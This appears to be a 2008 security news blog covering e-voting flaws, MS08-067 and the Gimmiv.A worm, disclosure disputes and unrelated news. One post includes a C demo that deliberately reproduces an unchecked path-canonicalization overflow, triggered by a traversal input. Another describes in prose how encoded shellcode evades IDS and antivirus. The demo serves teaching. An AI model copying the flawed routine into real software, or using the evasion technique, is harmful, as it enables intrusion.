The reports prompted the Brennan Center for Justice and a group called Verified Voting on Tuesday to write voting officials in 16 states where the ES&S iVotronic machine is used to be on the lookout for problems.

"There is a real chance that voters using iVotronic machines in your state will experience 'vote flopping' similar to that experienced by voters in West Virginia," the letter warned. It went on to urge poll workers to recalibrate machines when in doubt, and when possible to confirm voters' candidate choices with a verified paper trail.

The vote flipping warning comes on the heels of a 158-page report (PDF) computer scientists from Princeton University released two weeks ago warning of serious deficiencies in another commonly used e-voting machine. The Sequoia AVC Advantage 9.00H touch-screen voting machine, made by California-based Sequoia Voting Systems, is "easily hacked" in about seven minutes by replacing a single read-only memory chip or swapping out a separate processor chip.

The findings have prompted one candidate for the mayor of Bayonne, New Jersey, to ask the state's secretary of state to oversee the town's municipal election.

The study was ordered by a New Jersey judge who is presiding over a lawsuit challenging the use of e-voting machines in that state. Plaintiffs in the case argue the machines don't meet election law requirements for accuracy. State officials counter that they do.

ES&S has strongly refuted (PDF) the report, saying the researchers, among other things, improperly removed security seals and hardware before conducting their tests.

Even far from the nation's heartland, there were still more reports of botched e-voting. Finland's Ministry of Justice said Tuesday that about 2 percent of votes cast in an election held Sunday could not be counted because voters hadn't followed instructions. The machines, developed by IT services group TietoEnator, required voters to press a button marked OK twice before removing a smart card from the machine terminal. Voters who failed to do so were unable to cast their ballots.

New Windows Bug (MS08-067) Differs from 2006 Flaw

Via NYTimes -

Contrary to speculation, the bug Microsoft patched unexpectedly last week is not closely related to one the company fixed more than two years ago, a company security expert said Monday.

The vulnerability in the Windows Server service that Microsoft patched with an "out-of-cycle" fix last Thursday is unrelated to another hole in the same service that the company plugged with a patch in August 2006, said Michael Howard, a principal security program manager with the company.

Howard, perhaps best known for co-authoring the book Writing Secure Code, works in the Security Development Lifecycle (SDL) group at Microsoft; SDL is also the company's name for the process it uses to generate more secure software.

"I spent a good chunk of the morning going over the analysis [of the bugs]," said Howard at mid-day Monday. "The two bugs are actually quite different. Although the effect is the same, the way you pull off an exploit is very different."

The two vulnerabilities are so different, he added, that it was no surprise that company developers didn't find the most recent one when they looked at the Windows Server service code two years ago. "[This one] is a really hard bug to spot," Howard said.

Microsoft patched the Windows Server service in August 2006's MS06-040. Like the one posted Thursday, that bulletin calls out the remote procedure call (RPC) code in the service as the location of the bug.

To back up his claim that the newest flaw is easy to overlook, Howard cited a Twitter message three days ago from Alexander Sotirov, a noted independent security researcher. "I had the vulnerable function decompiled and fully commented back in 2006 when I was reversing MS06-040, but I just didn't see the bug," said Sotirov, who was one of a pair of researchers who helped Shane Macaulay hack Windows Vista SP1 during a March contest.

Howard acknowledged that parts of Microsoft's SDL process, specifically the fuzz tests thrown at the affected code, had failed. But he was generally upbeat about how well SDL did its job.

"At the end of the day, I'm not unhappy with how SDL performed," he said. "We have two goals. One is to reduce the number of vulnerabilities, and the second is to reduce the severity of those we miss. You're never going to get everything. Windows Vista and [Windows] Server 2008 [users] were protected; SDL reduced the seriousness of the vulnerability for them.

"So I think SDL did succeed here," Howard said.

ICANN Terminates Agreement with EstDomains

ICANN has terminated EstDomains, Inc. as an accreditation registrar.

Tuesday, October 28, 2008

Al-Qaida's Route Through Syria Persists

Via AP -

For years, he operated along Syria's remote border where donkeys are the only means of travel. He provided young Arabs from as far away as Morocco and the Persian Gulf with passports, guides and weapons as they slipped into Iraq to wage war.

But recently, the Iraqi man known as Abu Ghadiyah began doing even more — launching his own armed forays into his homeland, U.S. and Iraqi officials say.

Finally the United States lashed out, frustrated it says, after years of vainly pressuring Syria to shut down his network supplying the Sunni insurgency.

The Americans carried out a bold daylight raid Sunday in a dusty farming community of mud and concrete houses known as Abu Kamal, just across the border in Syria. The U.S. says Abu Ghadiyah and several bodyguards were killed. Syria says eight civilians died. At least one villager says U.S. forces seized two men and hauled them away.

Whatever Abu Ghadiyah's fate, the attack targeting him has become a seminal moment — casting rare light on the hidden, complex networks that recruit foreign fighters and then deliver them across Syria to the battlefields of Iraq.

Syria has long insisted it monitors the border and does all it can to stop weapons and fighters.

"They know full well that we stand against al-Qaida," Syrian Foreign Minister Walid al-Moallem said Monday in London. "They know full well we are trying to tighten our border with Iraq."

But the raid and U.S. documents — recently made public — indicate that insurgents operating in the Syrian border region are still providing the materiel that enables suicide attacks, bombings and ambushes to continue inside Iraq.

Even as the insurgency has fallen on rough times — battered and bleeding but not yet defeated — the networks themselves have become more organized, the documents indicate. That raises fears the insurgency could someday arise anew.

The documents also shed light on the murky web of religious extremists, professional smugglers and corrupt Syrian intelligence officials who run the smuggling networks — some of whom view Syria's government in faraway Damascus with contempt.

Until the raid, Abu Ghadiyah, whose real name was Badran Turki al-Mazidih, was mostly unknown outside a tight circle of Western and Iraqi intelligence officers. They tracked his movements, and the al-Qaida commanders who relied on his services, believing him a senior figure in al-Qaida in Iraq.

Abu Ghadiyah housed his recruits both in Damascus and the Syrian port of Latakiya before moving them across the Iraqi border, one senior Iraqi security officer said Tuesday. He spoke on condition of anonymity because he was not authorized to talk to media.

Scores of people are involved in the smuggling networks, officials say. But Iraqi police held special disdain for Abu Ghadiyah, a native of the northern Iraqi city of Mosul believed to be in his early 30s.

Last May, Abu Ghadiyah led a dozen gunmen across the border and attacked an Iraqi police station in Qaim, killing 12 policemen, Iraqi police Lt. Col. Falah al-Dulaimi told The Associated Press on Tuesday. Syrian border guards prevented an Iraqi patrol from pursuing the gunmen back into Syria, the police officer said.

Sunday's raid was launched because of intelligence that Abu Ghadiyah was planning another attack inside Iraq, a senior U.S. official told The Associated Press, also speaking anonymously because the information is classified.

Much of the publicly known information about networks such as Abu Ghadiyah's comes from documents seized during a U.S. military raid last year on a suspected al-Qaida hideout in the Iraqi city of Sinjar.

Those documents include records of about 590 foreign volunteers who entered Iraq from Syria, according to the Combating Terrorism Center at the U.S. Military Academy at West Point. The center released a report last July based largely on the documents.

According to the documents, nearly 100 Syrian coordinators are involved in transporting foreign fighters through Syria. Some are professional smugglers apparently hired by al-Qaida in purely business deals. Others are motivated by al-Qaida's hardline Islamic ideology.

Abu Ghadiyah's real beliefs are unclear, but a U.S. Treasury document says he was appointed as al-Qaida in Iraq's logistics chief for Syria by the group's founder, Abu Musab al-Zarqawi. That suggests Abu Ghadiyah was indeed a true believer.


There may be plenty of others to take Abu Ghadiyah's place, the U.S. says — including a brother Akram, and a cousin Ghazi Fezza al-Mazidih, whom the U.S. described in a February report as his "right hand man."

Overall, the number of foreign fighters attracted to Iraq may be down, the West Point study cautioned, "But the logistical network to move them has become more organized."

Custom Shellcode and Return-2-Libc on Mac OS X

After some time without any updates coming up, this article will show some techniques and strategies to improve reliability of exploit code in Mac OS X Tiger and Leopard (up to 10.5.5). Specifically, we will look at a technique to aid loading of stager shellcode and evading non-executable stack restrictions. This was hinted at in the "OS X Exploits and Defense" book (Elsevier), chapter 7, which I wrote earlier this year (co-authored the book with Kevin Finisterre).

Ideally, when shellcode size restrictions exist, and possibly in almost any situation where subtle and discreet operation is required, you should never use a standard or publicly available shellcode, like the usual so-called "bind shell" or "reverse shell". Not only are they identified by IDS vendors, but they will also fail when certain constraints are present. In addition, a combination of stubs (splitting functionality in small dock-able shellcodes) with an encoder will defeat most packet inspectors and signature-based detection products (for example, antivirus engines).


Bigs up to HD Moore for the link...

Microsoft Issues Security Patch for Pre-Beta Windows 7

Via CNet -

Microsoft released a security patch on Monday for software that won't be available publicly until Tuesday at the company's Professional Developer Conference.

Microsoft will be providing attendees of PDC 2008 on Tuesday with a pre-beta version of Windows 7, the successor to Windows Vista.

"A security issue has been identified that could allow an authenticated remote attacker to compromise your Microsoft Windows-based system and gain control over it," the security update says.

The more than 6,000 attendees who will be walking away from the sold-out event with the Windows 7 operating system software in hand could have been vulnerable to an attacker exploiting the security hole.

"The code that will be distributed at PDC for Windows 7 was put on CD before last week's security update was developed, so it will not contain the update," a Microsoft spokeswoman wrote in an e-mail request for comment. "However, when users install the pre-beta bits, they will be prompted to get the update from Windows Update, just like other Windows customers."

The security patch has been available since Wednesday. The critical security hole also affects Windows 2000, Windows XP, and Windows Server 2003.

Student Charged After Alerting Principal to Server Hack

Via The Register UK -

A 15-year-old high school student in New York State has been charged with three felonies after he allegedly accessed personnel records on his school's poorly configured computer network and then notified his principal of the security weakness.

The unnamed student of Shenendehowa Central School was charged Thursday with computer trespass, unlawful possession of personal identification information and identity theft, according to news reports. He has been suspended from school and ordered to stand charges in family court in Saratoga County.

He and a peer allegedly gained access to a file containing the personal information of 250 workers because of a district-wide error in setting up a new server. After accessing the information, he sent an email alerting the principal to the breach and signed it "A student." With the help of the district's IT department, the principal identified the boy as the culprit.

"The kid committed an intentional criminal act," state trooper Maureen Tuffey told The Times Union. "He deceitfully used someone else's name and password so he would not get caught and was looking to profit from his criminal act."

All that was needed to access the information was a district password. School officials have admitted that thousands of students, faculty and employees could have accessed the same file for up to two weeks. The file contained the social security numbers, driver's license numbers and home addresses of past and present employees, most of whom were bus drivers.

Since news of the charges was reported late last week, hackers have criticized administrators for turning the student into a scapegoat for the school board's shoddy computer security. We're inclined to agree, although it'd be nice if we knew more about the specifics of the email the fellow sent his principal. Additional coverage is available here and here.

New Microsoft MS08-067 Advisory + New Metasploit Modules

Microsoft is aware that detailed exploit code demonstrating code execution has been published on the Internet for the vulnerability that is addressed by security update MS08-067. This exploit code demonstrates code execution on Windows 2000, Windows XP, and Windows Server 2003. Microsoft is aware of limited, targeted active attacks that use this exploit code. At this time, there are no self-replicating attacks associated with this vulnerability. Microsoft has activated its Software Security Incident Response Process (SSIRP) and is continuing to investigate this issue.

Our investigation of this exploit code has verified that it does not affect customers who have installed the updates detailed in MS08-067 on their computers. Microsoft continues to recommend that customers apply the updates to the affected products by enabling the Automatic Updates feature in Windows.


Microsoft seems to confirm the idea that the piece of malware being called Gimmiv.A was the malware used in these observed limited, targeted attacks.

On the MSF front, HD Moore added the first real MS08-067 Metasploit module just about 6 hours ago. It currently supports XP SP2/SP3 + DEP and Windows 2003 SP0/SP1 without DEP, more targets soon...

Monday, October 27, 2008

ATF Foils Neo-Nazi Mass Murder Plot

Via (AP) -

Federal agents have broken up a plot to assassinate Democratic presidential candidate Barack Obama and shoot or decapitate 102 black people in a Tennessee murder spree, ATF officials said today.

In court records unsealed today, federal agents said they disrupted plans to rob a gun store and target a predominantly African-American high school by two neo-Nazi skinheads. Agents said the skinheads did not identify the school by name.

Jim Cavanaugh, special agent in charge of the Nashville field office for the Bureau of Alcohol, Tobacco, Firearms and Explosives, said the two men planned to shoot 88 black people and decapitate another 14. The numbers 88 and 14 are symbolic in the white supremacist community.

The men also sought to go on a national killing spree, with Obama as its final target, Cavanaugh told The Associated Press.

“They said that would be their last, final act — that they would attempt to kill Sen. Obama,” Cavanaugh said. “They didn’t believe they would be able to do it, but that they would get killed trying.”

Iranian General Reports Arming 'Liberation Armies'

Via Yahoo! News (AP) -

TEHRAN, Iran – Iran is supplying weapons to "liberation armies" in the Middle East, a top Revolutionary Guards commander said, offering the first official confirmation the country provides weapons to armed groups in the region.

Gen. Hossein Hamedani, deputy commander of a volunteer militia that is part of the elite Revolutionary Guards, did not provide specific details in the report on the state-run Borna news. The U.S. military has accused Iran of arming Shiite militias in Iraq, and Iran is widely believed to provide weapons to Lebanon's militant Shiite Hezbollah group.

"Not only are our armed forces self-sufficient, liberation armies of the region get part of their weapons from us," Hamedani said, according to the report on Borna's Web site late Sunday.

In the past, Iran — a majority Shiite country — has denied arming Hezbollah, saying it only provided political and financial support. The Iranian government has also denied providing weapons or financial support to Shiite militants fighting U.S. forces in Iraq.

But the U.S. military has said it has evidence that elements of the Mahdi army, an Iraqi militia loyal to anti-American Shiite cleric Muqtada al-Sadr, have been armed by Iran.

Hamedani also said Iran has no shortage of advanced missile systems.

"Our chemical engineers have upgraded Iran's missile capability," he was quoted as saying.

Hamedani didn't elaborate, but Iranian officials have said they successfully tested a solid fuel motor for the medium-range Shahab-3 ballistic missile, a technological breakthrough for Iran.

Experts say solid fuel increases the accuracy of missiles in reaching targets. But many in the West have expressed doubt about Iran's professed military accomplishments.

Iran launched an arms development program during its 1980-88 war with Iraq to compensate for a U.S. weapons embargo. Since 1992, Iran has produced its own tanks, armored personnel carriers, missiles and a fighter plane.

Hamas is Looking for a Few Good Hackers to Hack into Israeli Websites

Via LA Times -

The Tehran office of a Palestinian political group has announced it is offering cash prizes for any intrepid computer whiz who hacks into a "Zionist" website.

For the second year in a row, the representatives of Hamas in the Islamic Republic are holding a contest to encourage techies to break into the websites of hard-line Israeli political organizations such as Shas or Hagana, according to a report published in Tabnak, a Farsi-language news website.

Winners will receive cash prizes equivalent to about $2,000.

Hamas announced the competition at a media expo now underway in Tehran.

Contest organizers describe the hack-Zionist-websites-for-cash competition as a "peaceful and non-violent initiative."

It's also a bit of tit for tat. A group of Israeli hackers recently boasted of breaking into a Hamas website and uploading the Israeli national anthem onto it.

Hamas accused Israelis of breaking into one of their websites some years ago and diverting traffic to a pornography site, called "Hot Motel Horny Sex Sluts."

Observers noted that the contest gives a chance for Iran's many under-employed but tech-savvy computer geeks to earn some quick cash with their expertise.

Debunking Google's Security Vulnerability Disclosure Propaganda

Via CNET -

Question: You're a multi-billion dollar tech giant, you've launched a new phone platform after much media fanfare. Then, a security researcher finds a flaw in your product within days of its release. Worse, the vulnerability is due to the fact that you shipped old (and known to be flawed) software on the phones. What should you do? Issue an emergency update, warn users, or perhaps even issue a recall? If you're Google, the answer is simple -- attack the researcher.

With the news of a flaw in Google's Android phone platform making the New York Times on Friday, the search-giant quickly ramped up the spin machine. After first dismissing the amount of damage to which the flaw exposed users, anonymous Google executives then attempted to discredit the security researcher, Charlie Miller, a former NSA employee turned security consultant. Miller, the unnamed Googlers argued, acted irresponsibly by going to the New York Times to announce his vulnerability, instead of giving the Big G a few weeks or months to fix the flaw:

Google executives said they believed that Mr. Miller had violated an unwritten code between companies and researchers that is intended to give companies time to fix problems before they are publicized.

What the Googlers are talking about is the idea of "responsible disclosure," one method of disclosing security vulnerabilities in software products. While it is an approach that is frequently followed by researchers, it is not the only method available, and in spite of the wishes of the companies whose products are frequently analyzed, it is by no means the "norm" for the industry.

Another frequently used method is that of "full disclosure" -- in which a researcher will post complete details of a vulnerability to a public forum (typically a mailing list dedicated to security topics). This approach is often used by researchers when they have discovered a flaw in a product made by a company with a poor track record of working with researchers -- or worse, threatening to sue them. For example, some researchers refuse to provide Apple with any advanced notification, due to its past behavior.

A third method involves selling information on the vulnerabilities to third parties (such as Tippingpoint and iDefense) -- who pass that information on to their own customers, or perhaps keep it for themselves. Charlie Miller, the man who discovered the Android flaw, has followed this path in the past, most notably when he sold details of a flaw in the Linux Kernel to the US National Security Agency for $50,000 (pdf).

First, consider the fact that security is a two-sided coin. If Google wants researchers to come to it first with vulnerability information, it is only fair to expect that Google be forthcoming with the community (and the general public) once the flaw has been fixed. Google's approach in this area is that of total secrecy -- not acknowledging flaws, and certainly not notifying users that a vulnerability existed or has been fixed. Google's CIO admitted as much in a 2007 interview with the Wall Street Journal:

Regarding security-flaw disclosure, Mr. Merrill says Google hasn't provided much because consumers, its primary users to date, often aren't tech-savvy enough to understand security bulletins and find them "distracting and confusing." Also, because fixes Google makes on its servers are invisible to the user, notification hasn't seemed necessary, he says.

Second, companies do not have a right to expect "responsible disclosure." It is a mutual compromise, where the researchers provide the company with advance notification in exchange for some form of assurance that the company will act reasonably, keep the lines of communication open, and give the researcher full credit once the vulnerability is fixed.

Google's track record in this area leaves much to be desired. Many top tier researchers have not been credited for disclosing flaws, and in some cases, Google has repeatedly dragged its feet in fixing flaws. The end result is that many frustrated researchers have opted to follow the full disclosure path, after hitting a brick wall when trying to provide Google with advanced notice.

I can personally confirm this experience, after I discovered a fairly significant flaw in a number of commercial Firefox toolbars back in 2007. While Mozilla and Yahoo replied to my initial email within a day or so, and kept the lines of communication open, Google repeatedly stonewalled me, and I didn't hear anything from them for weeks at a time. Eventually, Google fixed the flaw a day or two after I went public with the vulnerability, 45 days after I had originally given the company private notice. As a result, I have extreme sympathy for those in the research community who have written Google off.


The Android platform is built on top of over 80 open source libraries and programs. This particular flaw had been known about for some time and already fixed in the current version of the open source libraries. The flaw in Google's product only exists because the company shipped out-of-date software, which was known to be vulnerable.


We saw the same thing in Google Chrome, which was built on an older, vulnerable version of WebKit. Using open-source components and libraries is a double-edged sword, at best: you inherit every upstream fix only as fast as you merge it.

Just look at IBM, HP, Apple and the hundreds of appliance vendors as perfect examples. All of these vendors regularly have to backport fixes to their bundled open-source components (OpenSSH, PHP, Apache, OpenSSL, etc.) into their customized products. But as we all know, some are quicker than others...

Austin's World Record Breaking Thriller Dance

Via Original Alamo Blog -

On October 25, 881 people gathered at the Long Center in Austin, Texas to attempt to break the Guinness World record for the largest synchronized Thriller dance. The old record was 140 people. Consider that record to be... shattered.

The record was witnessed by Mayor Will Wynn and Austin City Council Member Sheryl Cole.

Thrill the World Austin was executed by Alamo Drafthouse, Rude Mechanicals, Flash Mob Austin and sponsored by Mosaic | 5619, Mexic-Arte Museum, Ballet Austin, 6th Street Austin, the Long Center and the Capital Area Food Bank.

Check out the encore performance of Austin's Thrill the World Team in the Day of the Dead procession down Sixth Street on November 1st. Complete details on Thrill the World can be found on the official website.


Check the link above for the video...freaking awesome. Only in Austin ;)

Only a minor correction, but the old record was 147 dancers and was set in August 2008, by a group of school kids in the UK.

I mean, it was kinda unfair...we have Pirates Protesting Zombie Rights marching in Austin. Needless to say, the major groundwork was done; we just needed to get enough people to stop working for five minutes. Heh.

New Address Spoofing Flaw Smudges Google's Chrome

Via The Register UK -

Google's Chrome browser has been marred by yet another vulnerability, this one allowing attackers to impersonate websites of groups like the Better Business Bureau, PayPal or, well, Google.

Researcher Liu Die Yu of the TopsecTianRongXin research lab in Beijing says the spoofing vulnerability is the result of faulty code inserted by programmers from the Mountain View, California search behemoth.

"I don't see Apple Safari vulnerable in the same way," he writes in an email to The Register. "They share the same engine(webkit)."

As his proof of concept demonstrates, it is in fact possible to send Chrome users to a page under his control while causing the browser's address bar to display the domain name

A Google representative says Chrome's spoofing vulnerability is a "known issue" that will be fixed in an update that will be pushed to end users soon. Those too impatient to wait can download version of Chrome on Google's Dev Channel.

Minor Update on Gimmiv.A (MS08-067) Worm

Via -

It was quite clear that something strange was happening when everyone read the announcement of an out-of-band patch release from Microsoft. Usually Microsoft is quite rigorous about releasing patches and updates on the second Tuesday of the month. This out-of-the-ordinary update has left a lot of people wondering why it was needed.

Then, after Microsoft released security bulletin MS08-067 and the corresponding update KB958644, everything became clearer. A critical vulnerability had been found in the Windows Server service, in its handling of RPC requests. It is a critical hole similar to the ones exploited by the older Blaster and Sasser worms, a hole that could have opened the door for the return of Worms (with a capital W).

Why did Microsoft release this update in such a hurry? It's easily explained. Sure, it's a dangerous vulnerability, but the point is that it had already been used by malware in targeted attacks.

After the exploit was discovered, Microsoft decided to release an out-of-band update.

This vulnerability is present in all Microsoft Windows operating systems starting from Windows 2000 (2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista SP1, Server 2008). Ironically, even Microsoft's new operating system, the Windows 7 pre-beta, is vulnerable and needed an update.

On all operating systems prior to Windows Vista (so, Windows 2008 and Windows 7 are excluded) the vulnerability allows the remote execution of arbitrary code. On Windows Vista and later, the attack must be run by an authenticated user.


On a side note, Gimmiv.A looks like a test build. Its code is unoptimized and redundant, and there are lots of debug output strings. These are all details that could mean this malware was intended as a beta or debug release, to be used for targeted attacks but still not fully tested.


That last paragraph is new to me, I haven't heard that from other vendors that released information on the worm. If they did, then I have missed it up to now.

It makes sense however.

When the vulnerability was released, I figured we had a good week before a reliable public exploit was created (perhaps RCE'd from the patch itself) and some kid threw it into a worm framework. I knew vulnerability researchers would be working on it in short order, but I also knew that the likelihood of them releasing a worm from it was small. But a worm was released almost the same day as the patch...which was a bit unexpected in my book.

This can only mean that someone had this worm...and that they were sitting on it (or had used it as part of the original targeted attacks). Once they saw the cat was out of the bag, they released it to the world to make noise and cover their work. Hence, the unpolished debug code.

If you haven't patched, do it now....
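For those who want to see what kind of hole the Server service bulletin above is actually about: MS08-067 (CVE-2008-4250) was a stack buffer overflow in the path-canonicalization routine that the Server service runs on attacker-supplied paths. A crafted path with "..\" components made the routine scan backwards for the previous separator past the start of its own buffer and then write below it. The C program below is an added example written for this post; it is not Microsoft's code and not from any of the quoted articles. It reconstructs that bug class in a simplified canonicalizer: the output buffer sits inside an arena with a guard region standing in for "whatever is below the buffer on the stack", the unchecked variant walks the backward scan into that guard region and clobbers it, and the hardened variant adds the single lower-bound check that closes the hole. Buffer sizes, the 'G' fill and the stray separator at mem[0] are assumptions made so the demonstration stays in bounds.

```c
#include <stdio.h>
#include <string.h>

/*
 * Illustrative reconstruction of the bug class behind MS08-067: a path
 * canonicalizer that collapses "..\" by scanning backwards for the previous
 * separator without checking that the scan stays inside its own buffer.
 * Written for this post; not Microsoft's implementation. Layout, sizes and
 * sentinel bytes are assumptions for the demonstration.
 *
 * mem[GUARD..GUARD+OUT_CAP) is the canonicalization buffer; mem[0..GUARD)
 * stands in for whatever sits below that buffer on the real stack.
 */
#define GUARD   16
#define OUT_CAP 64

typedef struct { char mem[GUARD + OUT_CAP]; } arena;

static void arena_init(arena *a)
{
    memset(a->mem, 'G', GUARD);         /* recognisable fill for the region below the buffer */
    a->mem[0] = '\\';                   /* a stray separator below the buffer, as on a real stack */
    memset(a->mem + GUARD, 0, OUT_CAP); /* the canonicalization buffer itself */
}

static const char *arena_path(const arena *a) { return a->mem + GUARD; }

/* 1 if nothing below the buffer was written to, 0 if it was clobbered. */
static int arena_guard_intact(const arena *a)
{
    for (int i = 1; i < GUARD; i++)
        if (a->mem[i] != 'G') return 0;
    return 1;
}

/*
 * Canonicalize the absolute path `in` into the arena's output buffer.
 * Returns 0 on success, -1 if the path is rejected, -2 if the output would
 * not fit. hardened=0 reproduces the unchecked backward scan; hardened=1
 * adds the one bounds check that closes the hole.
 */
static int canonicalize(const char *in, arena *a, int hardened)
{
    char *base = a->mem;
    const int lo = GUARD, hi = GUARD + OUT_CAP;

    if (in[0] != '\\') return -1;       /* only absolute paths are handled */
    base[lo] = '\\';
    int pos = lo + 1;                   /* next write offset into mem */

    const char *p = in + 1;
    while (*p) {
        const char *end = strchr(p, '\\');
        size_t len = end ? (size_t)(end - p) : strlen(p);

        if (len == 2 && p[0] == '.' && p[1] == '.') {
            /* Pop the previous component: skip its trailing separator,
               then walk back to the separator that precedes it. */
            int q = pos - 2;
            if (hardened && q < lo) return -1;   /* FIX: never scan above the buffer start */
            while (q >= 0 && base[q] != '\\')    /* unchecked: q can wander into mem[0..lo) */
                q--;
            if (q < 0) q = 0;                    /* arena sentinel keeps this simulation in bounds */
            pos = q + 1;
        } else if (len == 1 && p[0] == '.') {
            /* "." is a no-op */
        } else if (len > 0) {
            if (pos + (int)len + 2 > hi) return -2;   /* component + '\' + NUL must fit */
            memcpy(base + pos, p, len);
            pos += (int)len;
            base[pos++] = '\\';
        }
        if (!end) break;
        p = end + 1;
    }
    if (pos > lo + 1) pos--;            /* drop the trailing separator except at the root */
    base[pos] = '\0';
    return 0;
}

int main(void)
{
    const char *inputs[] = { "\\foo\\bar\\..\\baz", "\\..\\evil" };
    for (int h = 0; h < 2; h++) {
        for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
            arena a;
            arena_init(&a);
            int rc = canonicalize(inputs[i], &a, h);
            printf("%-9s %-18s rc=%2d out=%-12s guard=%s\n",
                   h ? "hardened" : "unchecked", inputs[i], rc,
                   rc == 0 ? arena_path(&a) : "(none)",
                   arena_guard_intact(&a) ? "intact" : "CLOBBERED");
        }
    }
    return 0;
}
```

The ordinary path canonicalizes the same way in both variants; the difference only shows on "\..\evil". The unchecked variant reports success while having written "evil" into the guard region below its buffer, which on a real stack is saved registers and return addresses. The hardened variant rejects the path before touching anything. The lesson for the Vista-and-later note above is the same: authentication narrows who can reach the routine, but only the bounds check removes the bug.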

Science Says We Really Are What We Drink

Via Time Health & Science -

And now for some helpful scientific advice: When that IRS agent comes to your office to conduct an audit, offer him a cup of coffee. And when you're sitting down to do your holiday shopping online, make sure you're cradling a large glass of iced tea. The physical sensation of warmth encourages emotional warmth, while a chilly drink in hand serves as a brake on rash decisions — those are the practical lessons being drawn from recent research by two Yale-educated psychologists, published last week in Science magazine.

Encountering warmth or cold lights up the insula — a walnut-sized section of the brain — says John A. Bargh, a professor of psychology at Yale, who co-authored the paper with Lawrence E. Williams of the University of Colorado who received his Ph.D. from Yale earlier this year. And the insula is the same part of the brain engaged when we evaluate who we can trust in economic transactions, Bargh says.

Psychologists have known since the mid 1940s that one person's perception of another's "warmth" is a powerful determining factor in social relationships. Judging someone to be either "warm" or "cold" is a primary consideration, even trumping evidence that a "cold" person may be more competent. Much of this is rooted in very early childhood experiences, Bargh argues, when infants' conceptual sense of the world around them is shaped by physical sensations, particularly warmth and coldness. Classic studies by Harry Harlow, published in 1958, showed monkeys preferred to stay close to a cloth surrogate mother rather than one made of wire, even when the wire "mother" carried a food bottle. Harlow's work and subsequent studies have led psychologists to stress the need for warm physical contact from caregivers to help young children grow into healthy adults with normal social skills.

Feelings of "warmth" and "coolness" in social judgments appear to be universal. Although no comprehensive worldwide study has been done, Bargh says that describing people as "warm" or "cold" is common to many cultures, and studies have found those perceptions influence judgment in dozens of countries. To test the relationship between physical and psychological warmth, the researchers conducted two experiments. The first involved a group of 41 undergraduates who were taken by elevator to a fourth-floor room. During the ride, a research assistant who was unaware of the study's hypotheses handed the test subject either a hot cup of coffee or a cold drink to hold while the researcher filled out a short information form on a clipboard. The drink was then handed back. When the subjects arrived at the testing room, they were presented with a personality profile describing "Person A" and asked to rate that person's personality traits. Those who had briefly held the warm drink assessed Person A as warmer than test subjects who had held the iced drink.

"We are grounded in our physical experiences even when we think abstractly," says Bargh.

In a second experiment, done under the guise of a product-evaluation test, participants were asked to hold heated or frozen packs used to treat muscle aches. They were then told they could receive a gift certificate for a friend, or a gift for themselves. Those who held the hot pack proved to be more likely to ask for the gift certificate for a friend, while those who held the frozen pack tended to keep the gift.

"It appears that the effect of physical temperature is not just on how we see others, it affects our own behavior as well," Bargh said. "Physical warmth can make us see others as warmer people, but also cause us to be warmer — more generous and trusting — as well."

The practical advice Bargh takes away from the study is that important decisions are best taken with a cold drink in hand, because that part of the brain that triggers caution in economic and trust decisions is stimulated by cold sensation. Conversely, if you are planning on introducing your fiancee to mom and dad, pass on the icy martinis in that air-conditioned, glass and steel restaurant; do it over a mug of hot chocolate in front of a roaring fire.